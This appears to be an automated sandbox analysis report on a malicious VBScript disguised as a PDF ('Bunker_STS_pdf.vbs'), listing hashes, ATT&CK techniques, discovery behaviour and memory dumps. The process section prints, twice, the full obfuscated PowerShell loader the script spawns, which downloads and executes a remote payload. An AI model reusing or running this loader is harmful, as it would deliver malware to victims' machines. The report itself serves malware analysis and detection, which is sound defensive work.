36b0e1a17b7854904b1e3b3bdd16d94599fd7f3d54dc6fd4250409c737740171

General

Target

Bunker_STS_pdf.vbs
Size

13KB
MD5

5773cb94663b755bd1894b40d8c09abb
SHA1

a8f0eeedee12422917be79af4218d6bb12f2d961
SHA256

36b0e1a17b7854904b1e3b3bdd16d94599fd7f3d54dc6fd4250409c737740171
SHA512

d9f6df51417f72069abbc68c837249837185d96cd0b5eb3eae0c836882c5a764a56566dac33012a5fa4cafcb48b97965835816cdfea6c2d94441ec6670b9fa2d
SSDEEP

192:i+twG5TbOTOPDudut5SrhVCEWEkgfH/QYawbIuhKavkpavzesmGKnv2Yng6:iI5TQOPDuI5SPLHI9GvkpLs0vVx

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
13	3460	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3460	powershell.exe
5084	powershell.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
3460	powershell.exe
3460	powershell.exe
5084	powershell.exe
5084	powershell.exe
5084	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3460	powershell.exe
Token: SeDebugPrivilege	5084	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 1396 wrote to memory of 3460	1396	WScript.exe	83
PID 1396 wrote to memory of 3460	1396	WScript.exe	83

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Bunker_STS_pdf.vbs"
1⤵
- Checks computer location settings
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:1396
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Discotheques='Oxynitrate';;$Russificeringens='prisopgavens';;$Viuva='Prepersuasive';;$Electricians='Accoucheurer';;$Endimensional=$host.Name;function Bookrests($Finansieringsreglens){If ($Endimensional) {$Analysatortabellens=3} for ($reincite=$Analysatortabellens;;$reincite+=4){if(!$Finansieringsreglens[$reincite]){cls;break }$bulbjerg+=$Finansieringsreglens[$reincite];$Myasthenic='Digterkollektivs'}$bulbjerg}function Handsaws($antimallein){ .($Overvintrede) ($antimallein)}$Mimical=Bookrests 'cywN A eOrgTF a. rfw';$Mimical+=Bookrests ' vee NdBPreCAs l iIC,eE C N,amt';$Betydningslsestes=Bookrests ' FaMEnso Tiz C iPa lEpol TaaTil/';$Debutrolles=Bookrests 'skrTst lK msYam1Dem2';$megalocephalous=' sa[KolNHayEOutt.re.UdssIndesphrs.svsolibrucObsEDeppChaOUdtITidNMegtFosmMona oanIntasluG suEGanr et]sp :R.p:stes UnETouCIm UForRKunislutsulYElapG.iRAveo U T BooInwC BeOUnsl se=Kla$GledBelEGjoBAkaUH,pt aR ivoPi LequL seE ess';$Betydningslsestes+=Bookrests ' Ho5Rob. Le0s,c ,ma(Am WEksi C nsprdDeloFilws.osRa Ny.N emTDem Deb1Inu0 Re. R.0 ib;,el M.WPhai shnsal6Pir4 so;G n saxsma6Rha4spo;Oth .arsvevPre:K b1Tee3F s1Drf. an0ss ) B. uGG leTvacU ekUnroDe / ag2Opd0 us1.ru0pe.0 ns1bra0 Ed1Tp. IndF TeiPlurGruechif do syx Ex/c t1 Do3Lig1 He.Ar,0';$Opposing=Bookrests 'strUChus,ytedisR Bo-sexA agGBabeRe nEt.t';$Planlggelsers=Bookrests 'ThehTa,t amtv lpWizs F,:Que/Non/EpihPn.sspe2OvevRd,.skyiAegc,lau o/BeamGarr PrUMagJT.kZpraKLiljGyrBOph/neeGGavrs dyExpnalats meEscnAlpestasDon. nsTvae Pha';$reincitedentitetsproblemerne=Bookrests ' ng>';$Overvintrede=Bookrests 'OprI teTo x';$Biografiske='Matting';$Hemicephalous='\Detaillist.Neo';Handsaws (Bookrests 'afh$.ejgExplB,toposbsupAP.tlskv: FlMMa AOpfRBruIsmyEPl hg nNp oEHy RBio=Vek$H.reEndnsk VU,f: Fna E Psc pDisdWoyAUndTGrnA aa+s l$Tokh KeeVasMIngIPr CstyE O,p UdHBorATenL liOb auA.as');Handsaws (Bookrests 'L n$ Ovg LsLCecOLe B GaaUncLN c: TeTProestud itDR dYM,sb HajBrur Ddn veAdgnsu.EIn =sk $LivpMill nkA.okNAntLInig t GB seM dlIm sFaeEC vRF us T,.spysAropBralMetiG dTEle(Exc$ NorOrdeDisi beNR tCBldi L,TjomepegDJo.E aNLi.TH,aI DitLo E .atXansDisPBeaRKagosanbGitLK ueEneM nE K rTatnlikeUdp)');Handsaws (Bookrests $megalocephalous);$Planlggelsers=$Teddybjrnene[0];$Byggeforetagendets=(Bookrests 'Unw$ QuGAimL beoOr b Mea BrLsta: Chf nwyFoslCendT oE agkUnfaJavL niKOve=Pr,NFloEH,lW Af- KoOUhabHalJPriE egc fitOpv ecs G YUnosBittDecEWebmF.e.Lys$KnoMTipiNonMstoI racAlcA t L');Handsaws ($Byggeforetagendets);Handsaws (Bookrests 'Afv$ ydFBo.ys plUnddTyveAnakFr ase l PrkG,s.PleHspiePeraTred eeI erFa sspa[N n$Di OTelpFrapGesoMarsbrui kan osg Ud] ve=sub$TreB pre Bltc oyNondTs nAfpiBi nWing DesRadlKl.sMiseNapsEmbtB ge Zes');$Totalskade=Bookrests ' t$LatFA syBonlP,cd CoeBerkPreaGlel Luks.o.sacDEjeoMotwBilnDealLeaoChaaunddsukF FiiNa lFilesca(Bio$PenP salPreaDennforlPsegBiegPhye arlsa s.eceLogrVo s,pr,ord$BurH B jAlnlNonpHaneF alG nsRe )';$Hjlpels=$Mariehner;Handsaws (Bookrests 'Tr,$Bo g InlInuO InbCorARamLsam: ,eb,oreUvsL via Ens reTDemnsp I,odN regA,esE aPBilr arvRecEUsaRNed=In ( utGrae isEntt Li-GulpOv aHa,TAkahRul Per$sarH ucJMa,lRewP U ebutlIndsBra)');while (!$belastningsprver) {Handsaws (Bookrests 'B,g$LupgElslUxooAp bU ea sklRam:Kr,HClia UnlEnmsKr h .ovMariFulrPhavAdmes,rlCaieM.anDyb=Ben$retABenkDuntBlouUndasval.fpiU.csTyre .ir CreP,rd F e Fos') ;Handsaws $Totalskade;Handsaws (Bookrests 'Ar,s dvTJocaRanr P,TBu - PlsVallsomEPrve Fep R Rev4');Handsaws (Bookrests 'Mar$ reGstalshaOT.kbPibAs,iLOr :MisbVeseTu lPalALousU tt onVani AnNN ngMuisQuopGabREpivEmuE Fir,pe=,la( artFanE Anss aTP.l-BogpUtoALentKliHDin Hyl$silhMicJ rolBiopBroEDaaL JasG.o)') ;Handsaws (Bookrests 'Pro$scrG p,Ls nORvsBfala.ivLTro:Byga .hlGgec inO,ftH,ffo BeLUrdiKe,sspot H = P,$PerG FulGeoostrBDesaherlObj:samhtoryspjP acOMeggVilYGr NGevIAp uBromMee+erh+U,l%Huk$ K.tFunECo DBefD eaYcatbAwaJAriRYugNTrieR snIn,eDwa. oCChao.nsU.ygNI.lt') ;$Planlggelsers=$Teddybjrnene[$Alcoholist]}$Mngdeparentesers=325110;$Ordbogsfilers=29625;Handsaws (Bookrests 'Con$ PrgUseLB,aODe BOveAT nlK j:s eB FeACivR RokCalBKnaO OrU alnArbDRev1gra7 ru6Dyr Ddk=,kl CoaGF rEsmiTGe -KriC PhO unUnwTCh,ETilNB oTsk cau$F,iHCocJZanL.umpMe,EUbeLblos');Handsaws (Bookrests 'Fle$ egNerlC roge.b LiaN,tlGe.: reC ilaLibfHv.eLines,kn se Vol= Et Hus[ Mes scy has rotZageKeimOli.PraCKaroBa.n A v s e aar ant G ] Th: sp: PoF AnrsagoOxymtunBOldaWhes CoeTre6 Co4Ov sEzit D r tiOu nEnggsoo(C l$nucBsiraKlirafsk robPetoso u lonAnvdReg1Udk7Blo6 ar)');Handsaws (Bookrests 'Fja$PingDerl E.O UnbMicADd L O : ooUFr.DUrgPFamoT,ml Mas Udtd irKyliZ gN.ulGPycs M. s.i=s o .ch[ nts V.YcotsFriTNave ,tMJor.VaptProePlaxBrntsej.TorEBlinbiocP oO EdD Rhi.ean,pbGUd ]Ret:st :WhoAHydsPurcHypiOutiCac.AabgchaEskit des fT reRPanIFacnExtgBre( ln$ N,cTriA ifBa EDecEKu NK t)');Handsaws (Bookrests 'Ung$ TiGcitL.yto PabFodaPholsy :O eCPaelOneaV,dn stfIntEHvaLpedlHusOBetw Tr=L.e$ geuFamDN kpsjuOspiL ,rs,olt ndrDazi loN ntG ImsKon. Dis GaUBruBElysPretBogrAlpI F NPatgskr(akt$seqMro,NstogKacdA peLftPForATerrVeleskoN aTspyEPals Ove K RFalsGal, Ca$TemO MirRetDAntBMieOBedGWinsskaF.ntiDifLIntet fR tsBeu)');Handsaws $Clanfellow;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3460

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Discotheques='Oxynitrate';;$Russificeringens='prisopgavens';;$Viuva='Prepersuasive';;$Electricians='Accoucheurer';;$Endimensional=$host.Name;function Bookrests($Finansieringsreglens){If ($Endimensional) {$Analysatortabellens=3} for ($reincite=$Analysatortabellens;;$reincite+=4){if(!$Finansieringsreglens[$reincite]){cls;break }$bulbjerg+=$Finansieringsreglens[$reincite];$Myasthenic='Digterkollektivs'}$bulbjerg}function Handsaws($antimallein){ .($Overvintrede) ($antimallein)}$Mimical=Bookrests 'cywN A eOrgTF a. rfw';$Mimical+=Bookrests ' vee NdBPreCAs l iIC,eE C N,amt';$Betydningslsestes=Bookrests ' FaMEnso Tiz C iPa lEpol TaaTil/';$Debutrolles=Bookrests 'skrTst lK msYam1Dem2';$megalocephalous=' sa[KolNHayEOutt.re.UdssIndesphrs.svsolibrucObsEDeppChaOUdtITidNMegtFosmMona oanIntasluG suEGanr et]sp :R.p:stes UnETouCIm UForRKunislutsulYElapG.iRAveo U T BooInwC BeOUnsl se=Kla$GledBelEGjoBAkaUH,pt aR ivoPi LequL seE ess';$Betydningslsestes+=Bookrests ' Ho5Rob. Le0s,c ,ma(Am WEksi C nsprdDeloFilws.osRa Ny.N emTDem Deb1Inu0 Re. R.0 ib;,el M.WPhai shnsal6Pir4 so;G n saxsma6Rha4spo;Oth .arsvevPre:K b1Tee3F s1Drf. an0ss ) B. uGG leTvacU ekUnroDe / ag2Opd0 us1.ru0pe.0 ns1bra0 Ed1Tp. IndF TeiPlurGruechif do syx Ex/c t1 Do3Lig1 He.Ar,0';$Opposing=Bookrests 'strUChus,ytedisR Bo-sexA agGBabeRe nEt.t';$Planlggelsers=Bookrests 'ThehTa,t amtv lpWizs F,:Que/Non/EpihPn.sspe2OvevRd,.skyiAegc,lau o/BeamGarr PrUMagJT.kZpraKLiljGyrBOph/neeGGavrs dyExpnalats meEscnAlpestasDon. nsTvae Pha';$reincitedentitetsproblemerne=Bookrests ' ng>';$Overvintrede=Bookrests 'OprI teTo x';$Biografiske='Matting';$Hemicephalous='\Detaillist.Neo';Handsaws (Bookrests 'afh$.ejgExplB,toposbsupAP.tlskv: FlMMa AOpfRBruIsmyEPl hg nNp oEHy RBio=Vek$H.reEndnsk VU,f: Fna E Psc pDisdWoyAUndTGrnA aa+s l$Tokh KeeVasMIngIPr CstyE O,p UdHBorATenL liOb auA.as');Handsaws (Bookrests 'L n$ Ovg LsLCecOLe B GaaUncLN c: TeTProestud itDR dYM,sb HajBrur Ddn veAdgnsu.EIn =sk $LivpMill nkA.okNAntLInig t GB seM dlIm sFaeEC vRF us T,.spysAropBralMetiG dTEle(Exc$ NorOrdeDisi beNR tCBldi L,TjomepegDJo.E aNLi.TH,aI DitLo E .atXansDisPBeaRKagosanbGitLK ueEneM nE K rTatnlikeUdp)');Handsaws (Bookrests $megalocephalous);$Planlggelsers=$Teddybjrnene[0];$Byggeforetagendets=(Bookrests 'Unw$ QuGAimL beoOr b Mea BrLsta: Chf nwyFoslCendT oE agkUnfaJavL niKOve=Pr,NFloEH,lW Af- KoOUhabHalJPriE egc fitOpv ecs G YUnosBittDecEWebmF.e.Lys$KnoMTipiNonMstoI racAlcA t L');Handsaws ($Byggeforetagendets);Handsaws (Bookrests 'Afv$ ydFBo.ys plUnddTyveAnakFr ase l PrkG,s.PleHspiePeraTred eeI erFa sspa[N n$Di OTelpFrapGesoMarsbrui kan osg Ud] ve=sub$TreB pre Bltc oyNondTs nAfpiBi nWing DesRadlKl.sMiseNapsEmbtB ge Zes');$Totalskade=Bookrests ' t$LatFA syBonlP,cd CoeBerkPreaGlel Luks.o.sacDEjeoMotwBilnDealLeaoChaaunddsukF FiiNa lFilesca(Bio$PenP salPreaDennforlPsegBiegPhye arlsa s.eceLogrVo s,pr,ord$BurH B jAlnlNonpHaneF alG nsRe )';$Hjlpels=$Mariehner;Handsaws (Bookrests 'Tr,$Bo g InlInuO InbCorARamLsam: ,eb,oreUvsL via Ens reTDemnsp I,odN regA,esE aPBilr arvRecEUsaRNed=In ( utGrae isEntt Li-GulpOv aHa,TAkahRul Per$sarH ucJMa,lRewP U ebutlIndsBra)');while (!$belastningsprver) {Handsaws (Bookrests 'B,g$LupgElslUxooAp bU ea sklRam:Kr,HClia UnlEnmsKr h .ovMariFulrPhavAdmes,rlCaieM.anDyb=Ben$retABenkDuntBlouUndasval.fpiU.csTyre .ir CreP,rd F e Fos') ;Handsaws $Totalskade;Handsaws (Bookrests 'Ar,s dvTJocaRanr P,TBu - PlsVallsomEPrve Fep R Rev4');Handsaws (Bookrests 'Mar$ reGstalshaOT.kbPibAs,iLOr :MisbVeseTu lPalALousU tt onVani AnNN ngMuisQuopGabREpivEmuE Fir,pe=,la( artFanE Anss aTP.l-BogpUtoALentKliHDin Hyl$silhMicJ rolBiopBroEDaaL JasG.o)') ;Handsaws (Bookrests 'Pro$scrG p,Ls nORvsBfala.ivLTro:Byga .hlGgec inO,ftH,ffo BeLUrdiKe,sspot H = P,$PerG FulGeoostrBDesaherlObj:samhtoryspjP acOMeggVilYGr NGevIAp uBromMee+erh+U,l%Huk$ K.tFunECo DBefD eaYcatbAwaJAriRYugNTrieR snIn,eDwa. oCChao.nsU.ygNI.lt') ;$Planlggelsers=$Teddybjrnene[$Alcoholist]}$Mngdeparentesers=325110;$Ordbogsfilers=29625;Handsaws (Bookrests 'Con$ PrgUseLB,aODe BOveAT nlK j:s eB FeACivR RokCalBKnaO OrU alnArbDRev1gra7 ru6Dyr Ddk=,kl CoaGF rEsmiTGe -KriC PhO unUnwTCh,ETilNB oTsk cau$F,iHCocJZanL.umpMe,EUbeLblos');Handsaws (Bookrests 'Fle$ egNerlC roge.b LiaN,tlGe.: reC ilaLibfHv.eLines,kn se Vol= Et Hus[ Mes scy has rotZageKeimOli.PraCKaroBa.n A v s e aar ant G ] Th: sp: PoF AnrsagoOxymtunBOldaWhes CoeTre6 Co4Ov sEzit D r tiOu nEnggsoo(C l$nucBsiraKlirafsk robPetoso u lonAnvdReg1Udk7Blo6 ar)');Handsaws (Bookrests 'Fja$PingDerl E.O UnbMicADd L O : ooUFr.DUrgPFamoT,ml Mas Udtd irKyliZ gN.ulGPycs M. s.i=s o .ch[ nts V.YcotsFriTNave ,tMJor.VaptProePlaxBrntsej.TorEBlinbiocP oO EdD Rhi.ean,pbGUd ]Ret:st :WhoAHydsPurcHypiOutiCac.AabgchaEskit des fT reRPanIFacnExtgBre( ln$ N,cTriA ifBa EDecEKu NK t)');Handsaws (Bookrests 'Ung$ TiGcitL.yto PabFodaPholsy :O eCPaelOneaV,dn stfIntEHvaLpedlHusOBetw Tr=L.e$ geuFamDN kpsjuOspiL ,rs,olt ndrDazi loN ntG ImsKon. Dis GaUBruBElysPretBogrAlpI F NPatgskr(akt$seqMro,NstogKacdA peLftPForATerrVeleskoN aTspyEPals Ove K RFalsGal, Ca$TemO MirRetDAntBMieOBedGWinsskaF.ntiDifLIntet fR tsBeu)');Handsaws $Clanfellow;"
1⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

3

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d4ff23c124ae23955d34ae2a7306099a

SHA1
b814e3331a09a27acfcd114d0c8fcb07957940a3

SHA256
1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

SHA512
f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wtz5vfwf.opm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Detaillist.Neo

Filesize
461KB

MD5
f4c41b7d58a43784d7be5b820e8d74db

SHA1
bfabc4e9adadabe3476f733534131272d37b8155

SHA256
eb63735ab287f46ef67d3f301b58e3d4dea76a59eb326b97909b6e81697867f9

SHA512
63315ddf20fdf3c0975df0f915a3ce9d2a32adfbc09a5c37061120ea533fc76e34c7452c34a4a17cd18996ce98828e8d11fa37f034d496bc7d8240ba51cdd413

Download Submit
memory/3460-0-0x00007FFD77A33000-0x00007FFD77A35000-memory.dmp

Filesize
8KB

Download
memory/3460-1-0x000001B1D3A30000-0x000001B1D3A52000-memory.dmp

Filesize
136KB

Download
memory/3460-11-0x00007FFD77A30000-0x00007FFD784F1000-memory.dmp

Filesize
10.8MB

Download
memory/3460-12-0x00007FFD77A30000-0x00007FFD784F1000-memory.dmp

Filesize
10.8MB

Download
memory/3460-15-0x00007FFD77A30000-0x00007FFD784F1000-memory.dmp

Filesize
10.8MB

Download
memory/3460-18-0x00007FFD77A30000-0x00007FFD784F1000-memory.dmp

Filesize
10.8MB

Download
memory/5084-22-0x0000000005D60000-0x0000000005DC6000-memory.dmp

Filesize
408KB

Download
memory/5084-21-0x0000000005670000-0x0000000005692000-memory.dmp

Filesize
136KB

Download
memory/5084-23-0x0000000005DD0000-0x0000000005E36000-memory.dmp

Filesize
408KB

Download
memory/5084-30-0x0000000005E40000-0x0000000006194000-memory.dmp

Filesize
3.3MB

Download
memory/5084-20-0x00000000056C0000-0x0000000005CE8000-memory.dmp

Filesize
6.2MB

Download
memory/5084-35-0x0000000006550000-0x000000000656E000-memory.dmp

Filesize
120KB

Download
memory/5084-36-0x0000000006570000-0x00000000065BC000-memory.dmp

Filesize
304KB

Download
memory/5084-37-0x0000000007FD0000-0x000000000864A000-memory.dmp

Filesize
6.5MB

Download
memory/5084-38-0x0000000006AB0000-0x0000000006ACA000-memory.dmp

Filesize
104KB

Download
memory/5084-39-0x0000000007660000-0x00000000076F6000-memory.dmp

Filesize
600KB

Download
memory/5084-40-0x0000000007560000-0x0000000007582000-memory.dmp

Filesize
136KB

Download
memory/5084-41-0x0000000008650000-0x0000000008BF4000-memory.dmp

Filesize
5.6MB

Download
memory/5084-19-0x0000000004F70000-0x0000000004FA6000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads